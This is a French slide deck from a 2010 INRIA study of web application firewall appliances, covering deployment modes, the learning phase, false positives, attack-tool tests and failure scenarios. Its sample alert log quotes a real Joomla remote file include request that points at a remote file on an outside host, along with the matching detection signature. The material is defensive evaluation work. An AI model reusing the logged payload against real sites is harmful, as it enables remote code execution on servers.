Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria



Documents pareils
Bee Ware. Cible de Sécurité CSPN. Validation Fonctionnelle Validation Fonctionnelle Bon pour application AMOA BEEWARE BEEWARE

La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet

Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de

La Sécurité des Données en Environnement DataCenter

Présentation de la solution Open Source «Vulture» Version 2.0

Web Application Firewalls (WAF)

Firewall IDS Architecture. Assurer le contrôle des connexions au. Sécurité 1

2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES. 2.2 Architecture fonctionnelle d un système communicant.

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Réseau - Sécurité - Métrologie - Data Center. Le leader du marché allemand des UTM débarque en France avec des arguments forts!

1 LE L S S ERV R EURS Si 5

Sécurisation du réseau

Retour d expérience sur Prelude

DenyAll Protect. Sécurité & accélération. Parefeux pour applications et services Web. de vos applications.

Nouveaux outils de consolidation de la défense périmétrique

Découvrir les vulnérabilités au sein des applications Web

VTX Secure Sonicwall

La mémorisation des mots de passe dans les navigateurs web modernes

Technologies du Web. Créer et héberger un site Web. Pierre Senellart. Page 1 / 26 Licence de droits d usage

z Fiche d identité produit

Créée en 2002, la société PineApp est pionnière sur le. Le siège de la société se trouve aux États-Unis, avec des

Projet Sécurité des SI

WEB APPLICATION FIREWALL AVEC APACHE ET MOD_SECURITY

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

Maarch Framework 3 - Maarch. Tests de charge. Professional Services. 11, bd du Sud Est Nanterre

Réseaux. Moyens de sécurisation. Plan. Evolutions topologiques des réseaux locaux

Les utilités d'un coupe-feu applicatif Web

Un exemple d'authentification sécurisée utilisant les outils du Web : CAS. P-F. Bonnefoi

Protection des protocoles

Les Content Delivery Network (CDN)

Menaces et sécurité préventive

Alcatel-Lucent VitalQIP Appliance Manager

Routeurs de Services Unifiés DSR-1000N DSR-500N DSR-250N

Les risques HERVE SCHAUER HSC

Création d un «Web Worm»

Mon Sommaire. INEO.VPdfdf. Sécurisations des accès nomades

Cours CCNA 1. Exercices

I. Description de la solution cible

Appliances et logiciels Security

Fiche Technique. Cisco Security Agent

Teste et mesure vos réseaux et vos applicatifs en toute indépendance

Ubuntu Linux Création, configuration et gestion d'un réseau local d'entreprise (3ième édition)

Augmenter la disponibilité des applications JEE grâce au clustering : Le projet open source JShaft

Dr.Web Les Fonctionnalités

Outils de traitements de logs Apache

Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE

Catalogue «Intégration de solutions»

Sommaire. Introduction. Lancement produit. WhatsUp Companion. Démonstration produit Questions et réponses. Présentation Orsenna

Outils d administration

25 septembre Migration des accès au Registre national en protocole X.25 vers le protocole TCP/IP, pour les utilisateurs du Registre national

Revue de code Sécuritéou Test d Intrusion Applicatif. Quel est le plus efficace pour évaluer un niveau de sécurité applicatif?

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON

PPE 2-1 Support Systeme. Partie Support Système

Test d un système de détection d intrusions réseaux (NIDS)

Routeur Chiffrant Navista Version Et le protocole de chiffrement du Réseau Privé Virtuel Navista Tunneling System - NTS Version 3.1.

Serveurs de noms Protocoles HTTP et FTP

Présentation du ResEl

(structure des entêtes)

«clustering» et «load balancing» avec Zope et ZEO

Sécuriser les applications web de l entreprise

INTRUSION SUR INTERNET

FTPS AVEC UNE APPLIANCE FAST360 EN COUPURE. Table des matières

Mise en place de la composante technique d un SMSI Le Package RSSI Tools BOX

Proposition d une architecture pour ebay, en mettant l accent sur les notions de scalabilité, de résilience, et de tolérance aux pannes.

Disponibilité et fiabilité des services et des systèmes

Firewall. Souvent les routeurs incluent une fonction firewall qui permet une première sécurité pour le réseau.

Application des Spécifications détaillées pour la Retraite, architecture portail à portail

HTTP HTTP. IUT1 dpt SRC L Isle d Abeau Jean-françois Berdjugin. Introduction et architecture Messages Authentification Conclusion

FICHE PRODUIT COREYE CACHE Architecture technique En bref Plateforme Clients Web Coreye Cache applicative Références Principe de fonctionnement

Configurer le Serveur avec une adresse IP Statique (INTERFACE :FastEthernet) : et un masque

Une approche positive du filtrage applicatif Web. Didier «grk» Conchaudron Sébastien «blotus» Blot

Single Sign-On open source avec CAS (Central Authentication Service) Vincent Mathieu Pascal Aubry Julien Marchal

WIFI (WIreless FIdelity)

Tests de montée en charge avec Tsung

Appliances et logiciels Security

Ingénierie des réseaux

Services Réseaux - Couche Application. TODARO Cédric

Guide d Estimation Volumétrique des Logs

Hébergement de site web Damien Nouvel

Caches web. Olivier Aubert 1/35

LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation

Hébergement de sites Web

Sujet 2 : Interconnexion de réseaux IP (routeurs CISCO). Sujet 3 : Implémentation d un serveur VPN avec OpenVPN.

Réseaux. 1 Généralités. E. Jeandel

La sécurité périmètrique multi-niveaux. Un white paper de Daniel Fages CTO ARKOON Network Security

Laboratoire de Haute Sécurité. Télescope réseau et sécurité des réseaux

Développement d applications Internet et réseaux avec LabVIEW. Alexandre STANURSKI National Instruments France

COURS 5 Mettre son site en ligne! Exporter son site avec WordPress Duplicator Installer un logiciel FTP Faire le suivi des visites de son site avec

Vulnérabilités et sécurisation des applications Web

ClariLog - Asset View Suite

RTE Technologies. RTE Geoloc. Configuration avec Proxy ou Firewall


Bienvenue sur Lab-Windows Il n'y a de vents favorables que pour ceux qui ont un cap

LAB : Schéma. Compagnie C / /24 NETASQ

Linux sécurité des réseaux

Contrôle d accès Centralisé Multi-sites

Transcription:

Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria 1 Philippe Lecler TutoJRES «Sécurité des sites WEB» 4 février 2010

Contexte 2 PCI-DSS : Payment Card Industry Data Security Standard Rend obligatoire un Web Application Firewall (WAF IPS Web) afin de se protéger contre les attaques du OWASP Top 10. Cette norme est imposée par l industrie bancaire à des sites web principalement commerciaux. => Explosion de la demande en terme de WAFs. => Disparité entre les sites protégés par ces équipements et ceux qui ne le seront pas.

3 Contexte Les centres de recherche INRIA Chaque centre de recherche à ses serveurs web. Certains serveurs sont gérés par les services des moyens informatiques, d autres non.

4 Objectifs Estimer la pertinence et l intérêt des appliances WAF pour la sécurité des sites web INRIA. Proposer une ou plusieurs architectures de production et des scénarios de migration. Décrire pour chacune d'elles le scénario de fonctionnement. Identifier les sites pour lesquels les équipements ne fonctionneraient pas. Evaluer les performances des équipements afin que leur présence ne soit pas une gêne pour l'usager. Eviter que ces équipements ne soient des SPOF pour nos serveurs Web.

5 Le groupe de travail Didier Benza (Sophia) Cédric Vila (Nancy) Philippe Lecler (Rennes) L'équipe a abordé l'étude sans connaissance préalable véritable des solutions existantes. S'agissant d'une étude des solutions du marché, nous n'avons donc pas mis en place un formalisme important.

Le déroulement du projet 6 Mai 2009 Liste initiale de 8 constructeurs à partir du site de l OWASP. Etude WEB et sélection de 6 constructeurs. Juin 2009 Contacts initiaux avec les constructeurs. Sélection de 4 constructeurs. Juillet 2009 Visio-conférences avec les 4 constructeurs. Sélection d un constructeur pour le maquettage. Rédaction d un rapport intermédiaire. Aout Septembre 2009 Négociation du prêt et mise au point des modalités techniques. Octobre 2009 Tests. Rapport final

7 Caractéristiques des WAF Protection attaques du top 10 OWASP Terminaison de tunnels TLS/SSL Apprentissage Administration centralisée de boitiers répartis Génération de rapports, d'alarmes Support de 802.1Q Signature et chiffrement des cookies 0 1 2 3 4 Nombre d'appliances proposant cette fonctionnalité Nombre d'appliances remplissant partiellement cette fonctionnalité

8 Caractéristiques des WAF (2) Délégation d'administration Authentification LDAP Type de logs (syslog) Au moins 4 interfaces physiques Utilisation de signatures Fonctionnement en mode dégradé XML Suivi des utilisateurs du serveur WEB 0 1 2 3 4 Nombre d'appliances proposant cette fonctionnalité Nombre d'appliances remplissant partiellement cette fonctionnalité

Insertion dans l infrastructure 9 Mode reverse-proxy (toutes les solutions) L équipement porte l adresse IP du site WEB. Nécessité d intervenir sur les adresses dns des serveurs. Cela peut éventuellement poser des problème avec certaines applications web supportant mal ce fonctionnement. http://www.inria.fr www.inria.fr

Insertion dans l infrastructure (2) Mode transparent (ou bridge) Le WAF est placé en coupure sur le lien. Les paquets originaux ne sont pas modifiés, c est une copie qui est inspectée par l équipement. Si la transaction est jugée menaçante, le paquet est supprimé et les sessions en cours sont terminées (TCP RESET). Le WAF est configuré pour surveiller certains ports sur certaines adresses IP. Le reste du trafic traverse l équipement. 10 www.inria.fr Configurer le WAF : - Surveiller le port 80 pour l adresse IP de www.inria.fr

Insertion dans l infrastructure (3) 11 Mode sniffing Le WAF reçoit sur une de ses interfaces une copie des paquets transmis au serveur web. Une autre interface du WAF sert à envoyer des «TCP RESET» lorsqu' elle détecte un trafic menaçant. http://www.inria.fr www.inria.fr Duplication des paquets

12 Plateforme de tests WAF en mode transparent devant un serveur qui héberge un grand nombre de sites WEB. Couvre plusieurs technologies WEB (Plone, Joomla, Doku-wiki, Tomcat J2EE) et des développements locaux php ou cgi. Installation physique et connexion au réseau en 2 heures (présence d un ingénieur du constructeur et d un ingénieur réseau local). Démarrage du WAF et transfert de compétences par l ingénieur du constructeur pour la configuration et l administration en 2 demi-journées. Le WAF peut fonctionner en mode simulation ou en mode actif : nous l avons bien sûr configuré en mode simulation.

Phase d apprentissage / Mode simulation 13 Le WAF commence par une phase d apprentissage de chaque URL : Méthodes HTTP autorisées. Taille maximale des paramètres. Type des paramètres. Au bout d un certain nombre de requêtes, le WAF passe en mode protection (simulation de protection pour ce qui nous concerne). Si une requête n est pas conforme à ce qui a été appris, en fonction de la gravité, le WAF peut : Emettre un warning. Bloquer la requête. L administrateur peut configurer d autres actions comme le bannissement d une adresse IP pour une période donnée.

Faux positifs 14 Le nombre de faux positifs s est très rapidement réduit : au bout d une semaine, 3 ou 4 par jour. L ajout d une exception se fait en général en un clic, mais on peut faire des règles très sophistiquées. La plupart des faux positifs provenaient de modifications de documents dans les CMS ou WIKIS (paramètres très longs). Nous avons décidé d exclure de l analyse les réseaux INRIA => au bout d une dizaine de jours, on est arrivés à moins de 1 faux positif par jour.

15 Tests d attaque Simulations d attaque depuis une distribution «Linux Samurai Web Testing Framework» (LiveCD). Utilisation de : Grendel Scan : http://grendel-scan.com/ w3af : Web Application Attack and Audit Framework, http://w3af.sourceforge.net/ Première attaque avec le WAF en mode simulation Seconde attaque avec le WAF en mode actif.

16 Résultats des tests d attaques Sans protection WAF Avec protection WAF Taille du rapport W3AF 8,6 Mo 24 Ko Nombre d adresses email collectées 250 0 Logins valides 1 (SVN) 0 Chemins appris dans les pages HTML 144 0 Toutes les attaques lancées sur les différents sites ont été détectées très rapidement et ont échoué : incapacité à réaliser les reconnaissances les plus simples. Les machines attaquantes ont été mises en quarantaine en moins de 2 minutes.

Exemple de rapport généré par le WAF HTTP Req. 10/21/2009 17:32:55 IP: 63.223.85.28 ID: 8550848929318073152 Alert details: Number: 38545 Severity: High Type: Signature Last Update: 2009-10-21 17:32:56.0 Server Group: WEB Farm Description: Absolute_Path parameter Remote File Include attempt Immediate Action: Block Followed Action/s: Long IP Block : An email was sent to mi.gt.ipsweb@inria.fr (Wed Oct 21 17:32:56 CEST 2009) Long IP Block : IP was blocked. Duration: 3600 seconds (Wed Oct 21 17:32:56 CEST 2009) Event details: Service: Apache Application: Default Web Application Response Code: n/a Response Time: n/a Response Size: n/a Client-Size Details: Session ID: none Source IP: 63.223.85.28 (stream: 63.223.85.28 : 42161-131.254.254.46 : 80 ) 17

Exemple de rapport généré par le WAF (suite) 18 Server-side details: Host: isca2010.inria.fr URL: /index.php Method: GET Parameters: mosconfig_absolute_path: http://www.mgt21.co.kr/bbs///icon/support/x1.txt?? GLOBALS: http://www.mgt21.co.kr/bbs///icon/support/x1.txt?? view: articl _REQUEST[Itemid]: 1 _REQUEST[option]: com_content hellip;//index.php?_request: com_content option: com_content Headers: TE: deflate,gzip;q=0.3 Connection: TE, close Host: isca2010.inria.fr User-Agent: Mozilla/5.0 Cookies: Violations: Signature Violation Signature: Part="absolute_path", rgxp="absolute_path\s*=\s*(http https ftp):\/" Signature Description: Absolute_Path parameter Remote File Include attempt Matched Text: absolute_path=http:/ Found In: parameters Offset: 128 Dictionary Name: Recommended for Blocking for Web Applications

19 Performances souhaitées des équipements Métriques : Débit maximal des flux http analysés : 100 Mbits/s Débit maximal pouvant traverser l équipement (mode transparent) : 1Gbits/s Nombre de requêtes (HTTP ou HTTPS ) par seconde : 10 000/s Latence induite : < 1ms

Impact sur les performances 20 Nous n'avons pas pu mettre en évidence d'impact réel, positif ou négatif, du WAF sur la performance, que ce soit sur les accès clients ou sur la charge du serveur.

Reporting 21 Rapports très configurables.

Disponibilité : scénarios de pannes (1) 22 Panne électrique, software ou hardware du WAF : passage en mode fail open www.inria.fr Mode transparent => Perte de la protection, aucun impact sur le réseau et le service. Contournement : Ne pas activer le mode fail open. Sécuriser les liens réseaux. Mettre un autre WAF sur le lien de backup. La perte de la protection pendant un temps assez court est acceptable pour la plupart de nos sites.

Disponibilité : scénarios de pannes (2) 23 Panne électrique, software ou hardware du WAF : passage en mode fail open http://www.inria.fr www.inria.fr Mode Reverse-proxy => Pas de perte de la protection (plus d accès), aucun impact sur le réseau. Contournement : Mettre en place du load-balancing et basculer sur un autre WAF. La perte de l accès à pendant un temps très court est acceptable pour la plupart de nos sites.

Disponibilité : scénarios de pannes (3) 24 Panne électrique, software ou hardware du WAF : passage en mode fail open www.inria.fr Duplication des paquets Mode Sniffing => Perte de la protection, aucun impact sur le réseau et le service. Contournement : Mettre en place du sniffing simultané sur un autre WAF. La perte de la protection pendant un temps assez court est acceptable pour la plupart de nos sites.

Disponibilité : scénarios de pannes (4) 25 Panne sur une carte servant au mode transparent www.inria.fr Mode transparent Pas de perte de la protection (plus d accès), tout ce qui traverse le WAF est coupé!!! Contournement : Sécuriser les liens réseaux. Mettre un autre WAF sur le lien de backup. Arrêter le WAF

Conclusions 26 Protection effective contre les outils les plus courants d attaque. Bonne couverture des attaques du TOP 10 OWASP. Il n est pas obligatoire d avoir une bonne connaissance des applications WEB protégées pour administrer le WAF. En général, une customisation légère est déjà très efficace. La gestion des faux positifs reste très raisonnable. La charge induite par l administration d un WAF est très raisonnable par rapport à la charge induite en cas de piratage d un site Web. L utilisation d un WAF met en évidence les erreurs de conception de nos propres applications.